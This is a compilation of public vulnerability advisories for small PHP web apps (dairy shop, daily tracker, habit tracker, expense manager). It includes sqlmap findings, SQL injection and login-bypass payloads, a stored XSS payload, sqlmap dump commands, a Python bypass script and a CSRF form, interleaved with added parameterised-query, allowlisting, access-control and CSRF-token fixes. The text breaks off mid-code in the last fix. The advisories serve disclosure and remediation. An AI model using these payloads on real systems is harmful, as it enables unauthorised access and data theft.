Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
================================ 'category' & 'categorycode' - SQLi ================================
POST /dfsms/add-category.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/add-category.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1
category=test&categorycode=test&submit=
---
Parameter: category (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
---
Parameter: categorycode (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
================================ 'companyname' - SQLi ================================
---
Parameter: companyname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
================================ 'productname' & 'productprice' - SQLi ================================
---
Parameter: productname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
---
---
Parameter: productprice (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
================================ 'fromdate' & 'todate' - SQLi ================================
---
Parameter: todate (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=
Parameter: fromdate (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
---
================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================
---
Parameter: emailid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
---
---
Parameter: adminname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=
---
---
Parameter: mobilenumber (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
---
# Exploit Title: Daily Tracker System 1.0 - Authentication Bypass
# Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
# CVE ID: CVE-2020-24193
# Date: September 2, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Vulnerable Source Code
<?php
if (isset($_POST['login'])) {
    $email    = $_POST['email'];             // taken from the request unmodified
    $password = md5($_POST['password']);
    // Injection point: $email is interpolated straight into the SQL text, so a
    // value that closes the quote and starts a comment removes the password check.
    $query = mysqli_query($con, "select ID from tbluser where Email='$email' && Password='$password ' ");
    $ret   = mysqli_fetch_array($query);
    if ($ret > 0) {                          // any returned row counts as a successful login
        $_SESSION['detsuid'] = $ret['ID'];
        header('location:dashboard.php');
    } else {
        $msg = "Invalid Details.";
    }
}
?>
# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/dets/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1
email='+or+1%3d1+--+hyd3sec&password=badPass&login=login
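The Daily Tracker source above and the Dairy Farm Shop steps earlier on this page are the same defect: the login query is assembled by string interpolation, so the quote in the submitted value becomes SQL. The following is an added example, not the code of either project, that models that query in Python's `sqlite3` in the shape the PHP builds it (with `&&` written as `AND`, which SQLite requires) beside the parameterised form, and runs both against the two URL-decoded payloads the advisories quote. The table, the account `admin@example.test` and its password are constructed; the Dairy Farm payload is adapted to the `Email` column this table uses.

```python
"""Added example (not the Daily Tracker or Dairy Farm Shop code): the login query
from the vulnerable source above modelled in sqlite3, next to the parameterised form."""
import hashlib
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for tbluser with one constructed account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tbluser (ID INTEGER PRIMARY KEY, Email TEXT, Password TEXT)")
    con.execute("INSERT INTO tbluser VALUES (1, 'admin@example.test', ?)",
                (hashlib.md5(b"correct-horse").hexdigest(),))
    return con


def login_vulnerable(con: sqlite3.Connection, email: str, password: str) -> Optional[int]:
    """Mirrors the PHP: the raw email is spliced into the SQL text.
    Returns the user ID on success, None otherwise."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = f"SELECT ID FROM tbluser WHERE Email='{email}' AND Password='{pw_hash}'"
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con: sqlite3.Connection, email: str, password: str) -> Optional[int]:
    """Same query with bound parameters: the driver passes values separately from
    the SQL text, so quotes and comment markers in `email` are just characters."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = con.execute("SELECT ID FROM tbluser WHERE Email=? AND Password=?",
                      (email, pw_hash)).fetchone()
    return row[0] if row else None


# The two payloads quoted in the advisories, URL-decoded. The second is the
# Dairy Farm Shop form (step 4 above) applied to this table's Email column.
PAYLOAD_COMMENT = "' or 1=1 -- hyd3sec"
PAYLOAD_OR = "admin@example.test' or '1'='1"


if __name__ == "__main__":
    con = make_db()
    for email in (PAYLOAD_COMMENT, PAYLOAD_OR):
        print(f"{email!r:40} vulnerable -> {login_vulnerable(con, email, 'badPass')}"
              f"   safe -> {login_safe(con, email, 'badPass')}")
    print("real credentials, safe ->", login_safe(con, "admin@example.test", "correct-horse"))
```

In the interpolated version the first payload turns the statement into `... WHERE Email='' or 1=1 -- hyd3sec' AND Password='...'`, and everything after `--` is a comment; the second relies on `AND` binding tighter than `OR`, so `Email='admin@example.test'` alone satisfies the `WHERE` clause. With bound parameters both are simply e-mail addresses that match no row. Separately from the injection, the unsalted `md5` the PHP uses for passwords is kept here only to mirror the source; a password hash such as bcrypt or Argon2 belongs in a real fix.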
# Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24494
### Stored Cross-Site Scripting (XSS):
> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.
### Affected Components:
> add-tracker.php, update-tracker.php
Vulnerable parameters:
- day
- exercise
- pray
- read_book
- vitamins
- laundry
- alcohol
- meat
### Description:
> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application fails to sanitize user input when storing it in the database and reflects it back on the page without encoding.
## Proof of Concept:
The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability.
Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:
```
POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 175
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
```

## Recommendations
When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
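One way to implement that recommendation for the eight listed parameters, as an added example (not the project's code): every field the form offers has a fixed value set, so `add-tracker.php` / `update-tracker.php` can allowlist them on input, and `home.php` encodes them on output as a second layer. Function names are hypothetical.

```php
<?php
// Added example (not the project's code): input allowlisting for the
// add-tracker / update-tracker fields and output encoding when a tracker
// is rendered. Function names are hypothetical.

const DAYS   = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'];
const YES_NO = ['Yes', 'No'];
const HABITS = ['exercise', 'pray', 'read_book', 'vitamins', 'laundry', 'alcohol', 'meat'];

/**
 * Validate a tracker submission against the value sets the form offers.
 * Returns the cleaned fields, or null (with $errors filled) if anything is off.
 */
function validate_tracker(array $post, array &$errors): ?array
{
    $errors = [];
    $clean  = [];

    $date = $post['date'] ?? '';
    $d    = DateTime::createFromFormat('Y-m-d', $date);
    if (!$d || $d->format('Y-m-d') !== $date) {
        $errors[] = 'date must be YYYY-MM-DD';
    } else {
        $clean['date'] = $date;
    }

    // A day value with markup appended is simply not in the allowlist.
    if (!in_array($post['day'] ?? '', DAYS, true)) {
        $errors[] = 'day must be a weekday name';
    } else {
        $clean['day'] = $post['day'];
    }

    foreach (HABITS as $habit) {
        if (!in_array($post[$habit] ?? '', YES_NO, true)) {
            $errors[] = "$habit must be Yes or No";
        } else {
            $clean[$habit] = $post[$habit];
        }
    }
    return $errors ? null : $clean;
}

/** Encode a stored value for an HTML text context: the second line of defence. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Usage inside add-tracker.php / update-tracker.php:
//   $errors = [];
//   $row = validate_tracker($_POST, $errors);
//   if ($row === null) { http_response_code(400); exit(implode("\n", $errors)); }
//   ... bind the $row values into a prepared INSERT / UPDATE ...
// and in home.php when rendering a stored tracker:
//   echo '<td>' . h($tracker['day']) . '</td>';
```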
# Exploit Title: Daily Habit Tracker 1.0 - SQL Injection
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24495
### SQL Injection:
> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
### Affected Components:
> delete-tracker.php
### Description:
> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.
## Proof of Concept:
### Manual Exploitation
The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:
```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```

### SQLMap
Save the following request to `delete_tracker.txt`:
```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```
Use `sqlmap` with `-r` option to exploit the vulnerability:
```
sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump
```
## Recommendations
When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
# Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24496
### Broken Access Control:
> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.
### Affected Components:
> home.php, add-tracker.php, delete-tracker.php, update-tracker.php
### Description:
> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.
## Proof of Concept:
### Unauthenticated Access to Home page
> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page.
### Create Tracker as Unauthenticated User
To create a tracker, use the following request:
```
POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
```
### Update Tracker as Unauthenticated User
To update a tracker, use the following request:
```
POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes
```
### Delete Tracker as Unauthenticated User:
To delete a tracker, use the following request:
```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
```
## Recommendations
When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.
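A server-side fix that serves both this advisory and the SQL Injection one above, as an added example that is not the project's code: one `require_login()` gate for the four listed pages, and a `delete-tracker.php` that treats `tracker` as an integer bound parameter and scopes the DELETE to the session user, which closes the unauthenticated delete and the injection in the same endpoint. It assumes a mysqli connection in `$conn`, a session key `user_id` set at login, and a `user_id` column on `tbl_tracker` (all assumptions).

```php
<?php
// Added example (not the project's code): an authentication gate shared by
// home.php, add-tracker.php, update-tracker.php and delete-tracker.php, plus a
// delete-tracker.php that only deletes the caller's own row through a bound
// parameter. Assumes a mysqli connection in $conn, a session key 'user_id'
// set at login, and a tbl_tracker table with columns tbl_tracker_id and
// user_id (the column name is an assumption).
session_start();

function require_login(): int
{
    if (empty($_SESSION['user_id'])) {
        // Unauthenticated: serve nothing and run no query.
        header('Location: /habit-tracker/index.php');
        exit;
    }
    return (int) $_SESSION['user_id'];
}

function delete_tracker(mysqli $conn, int $userId, string $rawId): bool
{
    // Accept only a plain positive integer before anything reaches SQL;
    // the quoted/stacked payload from the advisory fails this check.
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $rawId)) {
        return false;
    }
    $trackerId = (int) $rawId;

    // The user_id predicate is the authorization check: another user's
    // tracker id deletes nothing instead of deleting their data.
    $stmt = $conn->prepare('DELETE FROM tbl_tracker WHERE tbl_tracker_id = ? AND user_id = ?');
    $stmt->bind_param('ii', $trackerId, $userId);
    $stmt->execute();
    $deleted = $stmt->affected_rows === 1;
    $stmt->close();
    return $deleted;
}

// delete-tracker.php body. A state-changing action should also be POST-only
// with a CSRF token; the GET form is kept here only to mirror the original route.
$userId = require_login();
if (delete_tracker($conn, $userId, $_GET['tracker'] ?? '')) {
    header('Location: /habit-tracker/home.php');
} else {
    http_response_code(404);
    echo 'No such tracker';
}
```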
# Exploit Title: Daily Expenses Management System 1.0 - 'username' SQL Injection
# Exploit Author: Daniel Ortiz
# Date: 2020-08-01
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Tested on: XAMPP Version 5.6.40 / Windows 10
# Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
import sys
import requests
import urllib3
import re
import time

urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)


def make_request(url, payload):
    # All requests are routed through a local intercepting proxy (e.g. Burp on 127.0.0.1:8080)
    p = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}
    s = requests.Session()
    r = s.post(url, data=payload, proxies=p)
    return r


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("[*] Daily Expenses Management System | username SQL injection")
        print("[*] usage: %s TARGET" % sys.argv[0])
        print("[*] e.g: %s 192.168.0.10" % sys.argv[0])
        sys.exit(-1)
    TARGET = sys.argv[1]
    LOGIN_FORM = "http://%s/dets/" % TARGET
    # Step 1 - Bypass login form
    url = LOGIN_FORM
    p1 = {'email': "admin' or '1'='1'#", 'password': 'admin', 'login': 'login'}
    r = make_request(url, p1)
    # The % formatting belongs inside the print() call (the original applied it to print's return value)
    print("[+] Endpoint: %s" % LOGIN_FORM)
    print("[+] Making requests with payload: %s" % p1)
    # A successful bypass lands on the dashboard page
    if re.findall('Dashboard', r.text):
        print("[+] Target vulnerable")
    else:
        print("[-] Error !!!")
# Exploit Title: Daily Expenses Management System 1.0 - 'item' SQL Injection
# Date: 2020-08-05
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
# Version: 1.0
# Tested on: XAMPP / Windows 10
-------------------------------------------------------------------------------------------------------------------------------------
# Feature: Add Expenses
# Vulnerable file: add-expense.php
# Vulnerable parameter :
- item
- costitem
# PoC
Url : http://example.com/dets/add-expense.php
Method : POST
# Burpsuite Requests
POST /dets/add-expense.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/add-expense.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1
dateexpense=1337-11-11&item=1%27+AND+%28SELECT+8429+FROM+%28SELECT%28SLEEP%285%29%29%29IWeV%29+AND+%27hmPP%27%3D%27hmPP&costitem=2&submit=
# Payload
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: dateexpense=1337-11-11&item=1' AND (SELECT 8429 FROM (SELECT(SLEEP(5)))IWeV) AND 'hmPP'='hmPP&costitem=2&submit=
# Sqlmap Command
sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3
-------------------------------------------------------------------------------------------------------------------------------------
# Feature: Edit Profile
# Vulnerable file: user-profile.php
# Vulnerable parameter :
- fullname
# PoC
Url : http://example.com/dets/user-profile.php
Method : POST
# Burpsuite Requests
POST /dets/user-profile.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 189
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/user-profile.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1
fullname=%27+AND+%28SELECT+2029+FROM+%28SELECT%28SLEEP%285%29%29%29JJJm%29+AND+%27UMUq%27%3D%27UMUq&email=info%40sql.id&contactnumber=1337173137&regdate=2020-08-05+13%3A49%3A51&submit=
# Payload
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fullname=admin3' AND (SELECT 2029 FROM (SELECT(SLEEP(5)))JJJm) AND 'UMUq'='UMUq&email=info@sql.id&contactnumber=1337173137&regdate=2020-08-05 13:49:51&submit=
# Sqlmap Command
sqlmap -u "https://example.com/dets/user-profile.php" --data="fullname=admin3*&email=info%40sql.id&contactnumber=1337173137&regdate=2020-08-05+13%3A49%3A51&submit=" --random-agent --threads 5 --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" -v 3 --dbs
-------------------------------------------------------------------------------------------------------------------------------------
# Feature: Expense Reports
# Vulnerable file:
- expense-monthwise-reports-detailed.php
- expense-datewise-reports.php
- expense-yearwise-reports.php
# Vulnerable parameter :
- fromdate
- todate
# PoC
Url : http://example.com/dets/expense-monthwise-reports-detailed.php
Method : POST
# Burpsuite Requests
POST /dets/expense-yearwise-reports-detailed.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/expense-yearwise-reports.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1
fromdate=2020-08-13'+AND+(SELECT+1473+FROM+(SELECT(SLEEP(5)))rhGI)+AND+'moGo'%3d'moGo&todate=2020-08-20&submit=
# Payload
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=2020-08-13' AND (SELECT 1473 FROM (SELECT(SLEEP(5)))rhGI) AND 'moGo'='moGo&todate=2020-07-29&submit=
# Sqlmap Command
sqlmap -u "https://example.com/dets/expense-monthwise-reports-detailed.php" --data="fromdate=2020-08-13*&todate=2020-07-29&submit=" --random-agent --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" --dbs
-------------------------------------------------------------------------------------------------------------------------------------
# Feature: Login Page
# Bypass Login Using SQLi on Admin/Member
# Vulnerable file: index.php
# PoC
URL : https://example.com/dets/index.php
Logging in with following details:
- Payload : "' OR 1=1 -- '"@sql.id
# Burp Requests
POST /dets/index.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Origin: http://example.com
Connection: close
Referer: http://example.com/dets/index.php
Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
Upgrade-Insecure-Requests: 1
email="' OR 1=1 -- '"@sql.id&password=1337&login=login
# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 8, 2019
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS
# PoC:
<html>
<body>
<form action="http://server/homeedit.php?delincome=778" method="post">
<input type="submit" value="Click!" />
</form>
</body>
</html>
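Synchronizer-token protection for the income-delete action, added here as an example that is not the project's code: the `?delincome=ID` GET route is replaced by a POST that must carry a per-session token, which a cross-site form like the one above cannot obtain. Function names are hypothetical; the cookie flags need PHP 7.3 or later.

```php
<?php
// Added example (not the project's code): CSRF protection for the income-delete
// action in homeedit.php. Function names are hypothetical.

// Defence in depth: a Lax SameSite session cookie is not sent on cross-site
// POSTs at all (array form of session_set_cookie_params needs PHP 7.3+).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

/** Return the session's CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden field to embed in every state-changing form. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
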